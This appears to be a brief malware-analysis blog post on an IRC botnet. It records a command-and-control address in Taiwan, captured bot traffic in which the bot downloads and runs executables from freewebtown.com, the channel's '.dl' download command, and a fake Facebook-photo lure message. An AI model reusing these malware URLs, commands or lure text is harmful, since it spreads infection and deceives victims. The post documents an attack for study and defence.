163.20.108.31(botnet hosted in Taiwan Taipei Tanet Taipei Nccu Regional Network)

Remote Host Port Number
163.20.108.31 1863
208.75.230.43 80

* The data identified by the following URLs was then requested from the remote web server:
o http://www.freewebtown.com/newlow/im.exe
o http://www.freewebtown.com/newlow/photo.exe

JOIN #newbin# abc
PONG 422
PRIVMSG #newbin# :[Download]: Downloading File From: http://www.freewebtown.com/newlow/im.exe, To: C:Documents and SettingsUserNameApplication Dataqghumeaylnlfdxfircvs85.exe
PRIVMSG #newbin# :[Download]: File Successfully Downloaded To: C:Documents and SettingsUserNameApplication Dataqghumeaylnlfdxfircvs85.exe
PRIVMSG #newbin# :[Download]: Successfully Executed: C:Documents and SettingsUserNameApplication Dataqghumeaylnlfdxfircvs85.exe
NICK n[USA|XP]007681
USER 0076 “” “TsGh” :0076
JOIN #im# abc
NICK [USA|XP]021824
USER 0218 “” “TsGh” :0218

00000000 | 5041 5353 205C 676F 6F67 6C65 5F63 6163 | PASS google_cac
00000010 | 6865 322E 746D 700D 0A50 4153 5320 5C67 | he2.tmp..PASS g
00000020 | 6F6F 676C 655F 6361 6368 6532 2E74 6D70 | oogle_cache2.tmp
00000030 | 0D0A | ..

Now talking in #im#
Topic On: [ #im# ] [ .dl http://www.freewebtown.com/newlow/photo.exe ]
Topic By: [ rm ]

.im hey, is this really you? http://tiny.cc/facebook-photo-18-02-2011

infos about hosting:
http://whois.domaintools.com/163.20.108.31

Categories: Uncategorized